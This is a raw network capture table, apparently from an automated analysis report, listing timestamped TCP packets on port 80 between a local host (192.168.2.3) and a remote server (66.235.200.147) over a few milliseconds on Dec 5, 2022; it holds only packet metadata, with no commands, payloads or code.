Dec 5, 2022 01:32:37.971240997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971261024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971292973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971297026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.971313953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971332073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971350908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971437931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971456051 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971476078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971493959 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971512079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971558094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971630096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971648932 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971693993 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971712112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971729994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971750021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971807957 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971827030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971875906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971889973 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.971910000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971916914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.971930981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971940994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.971950054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.971966028 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.971978903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972008944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972017050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972029924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972048998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972067118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972075939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972111940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972151995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972184896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972187996 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972203970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972218990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972237110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972286940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972306013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972323895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972326994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972342014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972343922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972363949 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972379923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972393036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972409964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972428083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972443104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972446918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972482920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972490072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972510099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972526073 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972528934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972546101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972563982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972568035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972599030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972601891 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972644091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972647905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972686052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972707987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972745895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972754002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972774029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972790956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972793102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972810984 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972811937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972831964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972831964 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972850084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972850084 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972867966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972870111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972887993 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972908974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972944021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.972985983 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.972991943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973011971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973059893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973067045 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973078966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973086119 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973095894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973117113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973125935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973166943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973166943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973186016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973206043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973217010 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973226070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973246098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973272085 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973289013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973308086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973340988 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973356009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973375082 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973388910 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973397017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973416090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973424911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973436117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973447084 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973464012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973473072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973474979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973494053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973511934 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973520994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973541021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973547935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973548889 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973562002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973579884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973598003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973603964 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973618984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973623037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973639965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973644972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973659992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973663092 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973710060 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973710060 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973817110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973835945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973855019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973860979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973874092 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973893881 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973896027 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973896027 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973912954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.973936081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973936081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.973973036 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974081039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974101067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974133015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974140882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974153042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974167109 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974173069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974194050 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974194050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974205017 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974214077 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974229097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974234104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974251032 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974256039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974271059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974276066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974287987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974294901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974308968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974314928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974328995 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974349022 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974411964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974445105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974445105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974464893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974478006 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974483967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974498987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974503994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974517107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974524021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974541903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974543095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974559069 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974562883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974577904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974582911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974601984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974601984 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974616051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974621058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974638939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974639893 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974658012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974658966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974672079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974678040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974693060 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974715948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974932909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974951982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974970102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.974971056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974983931 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.974989891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975006104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975012064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975028038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975030899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975049973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975049973 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975066900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975084066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975085974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975105047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975122929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975140095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975142002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975162029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975169897 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975194931 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975208998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975328922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975347996 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975366116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975366116 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975384951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975385904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975398064 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975406885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975423098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975425959 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975445986 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975445986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975461006 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975466967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975483894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975486040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975503922 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975506067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975521088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975526094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975543976 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975545883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975560904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975567102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975583076 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975588083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975601912 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975609064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975621939 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975631952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975641012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975651979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975667953 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975671053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975689888 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975706100 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975915909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975934982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975953102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975956917 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975970984 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975971937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.975986958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.975992918 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976005077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976011038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976032972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976042032 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976125956 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976155996 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976172924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976192951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976210117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976212025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976231098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976233006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976243019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976254940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976270914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976274967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976289034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976294994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976310968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976315975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976330042 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976335049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976350069 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976355076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976376057 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976388931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976397991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976406097 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976422071 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976423025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976442099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976443052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976459026 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976463079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976475954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976478100 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976492882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976495981 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976506948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976511002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976528883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976531982 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976545095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976545095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976562977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976564884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976578951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976587057 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976597071 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976598024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976614952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976617098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976632118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976635933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976645947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976650000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976667881 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976669073 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976685047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.976686954 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976702929 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.976720095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977057934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977075100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977108955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977108955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977129936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977134943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977144003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977148056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977165937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977183104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977185011 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977215052 CET	49705	80	192.168.2.3	66.235.200.147
